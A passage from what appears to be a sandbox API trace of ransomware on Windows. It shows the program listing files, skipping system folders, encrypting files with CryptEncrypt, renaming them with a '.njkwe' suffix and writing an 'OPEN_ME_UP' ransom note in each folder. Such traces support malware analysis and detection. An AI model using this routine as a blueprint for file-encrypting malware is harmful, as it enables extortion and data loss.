pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0075.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\1__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\1__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.820] GetProcessHeap () returned 0xbe0000 [0075.820] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.820] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66853, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66853, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66853, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Policy.provxml", cAlternateFileName="")) returned 0 [0075.820] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0075.820] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0075.820] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.820] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0075.821] CloseHandle (hObject=0x438) returned 1 [0075.821] GetProcessHeap () returned 0xbe0000 [0075.821] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.821] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66853, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66853, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66853, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x23f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0075.821] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0075.821] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0075.821] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0075.822] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0075.822] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0075.822] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml") returned 97 [0075.822] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0075.822] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.822] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0075.822] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.822] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.822] GetTickCount () returned 0x11534c8 [0075.822] GetTickCount () returned 0x11534c8 [0075.822] GetTickCount () returned 0x11534c8 [0075.822] GetTickCount () returned 0x11534c8 [0075.822] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0075.822] GetProcessHeap () returned 0xbe0000 [0075.822] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0075.822] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x23f, lpOverlapped=0x0) returned 1 [0075.861] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffdc1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.861] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x23f, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x23f, lpOverlapped=0x0) returned 1 [0075.861] GetProcessHeap () returned 0xbe0000 [0075.861] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0075.861] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.861] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0075.862] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0075.862] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0075.862] CloseHandle (hObject=0x438) returned 1 [0075.862] GetProcessHeap () returned 0xbe0000 [0075.862] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.862] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0075.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.863] GetProcessHeap () returned 0xbe0000 [0075.863] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.863] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66853, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66853, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66853, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x23f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0075.863] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0075.866] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0075.866] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.866] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0075.867] CloseHandle (hObject=0x434) returned 1 [0075.867] GetProcessHeap () returned 0xbe0000 [0075.867] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.867] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0075.867] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0075.867] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0075.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.869] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0075.870] CloseHandle (hObject=0x430) returned 1 [0075.870] GetProcessHeap () returned 0xbe0000 [0075.870] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0075.870] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", cAlternateFileName="{8D196~1")) returned 1 [0075.870] lstrcmpiW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="Windows") returned -1 [0075.870] lstrcmpiW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="$Recycle.bin") returned 1 [0075.870] lstrcmpiW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="System Volume Information") returned -1 [0075.870] lstrcmpiW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="Program Files") returned -1 [0075.870] lstrcmpiW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="Program Files (x86)") returned -1 [0075.870] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}") returned 80 [0075.870] lstrcmpW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2=".") returned 1 [0075.871] lstrcmpW (lpString1="{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="..") returned 1 [0075.871] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.871] GetProcessHeap () returned 0xbe0000 [0075.871] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0075.871] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\*") returned 82 [0075.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0075.871] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.871] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.871] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.871] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.872] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.872] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\.") returned 82 [0075.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.872] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.872] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.872] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.872] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.872] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.872] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.872] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\..") returned 83 [0075.872] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.872] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.872] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ef390d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ef390d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f19b66, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0075.872] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0075.872] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0075.872] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0075.872] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0075.872] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0075.872] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml") returned 99 [0075.872] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0075.872] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.872] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0075.872] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.872] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.872] GetTickCount () returned 0x11534f7 [0075.872] GetTickCount () returned 0x11534f7 [0075.872] GetTickCount () returned 0x11534f7 [0075.872] GetTickCount () returned 0x11534f7 [0075.872] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.873] GetProcessHeap () returned 0xbe0000 [0075.873] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.873] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x34d, lpOverlapped=0x0) returned 1 [0075.874] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffcb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.874] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x34d, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x34d, lpOverlapped=0x0) returned 1 [0075.874] GetProcessHeap () returned 0xbe0000 [0075.874] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.874] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.875] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.875] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.875] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.875] CloseHandle (hObject=0x434) returned 1 [0075.875] GetProcessHeap () returned 0xbe0000 [0075.875] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.875] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0075.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.875] GetProcessHeap () returned 0xbe0000 [0075.875] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.876] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ef390d, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ef390d, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ef390d, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0075.876] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0075.876] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0075.876] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0075.876] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0075.876] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0075.876] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml") returned 100 [0075.876] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0075.876] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.876] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0075.876] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.876] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{8d196d7f-3eef-48ad-8bea-be749f12d3ad}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.877] GetTickCount () returned 0x1153506 [0075.877] GetTickCount () returned 0x1153506 [0075.877] GetTickCount () returned 0x1153506 [0075.877] GetTickCount () returned 0x1153506 [0075.877] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.877] GetProcessHeap () returned 0xbe0000 [0075.877] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.877] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.878] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.878] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: 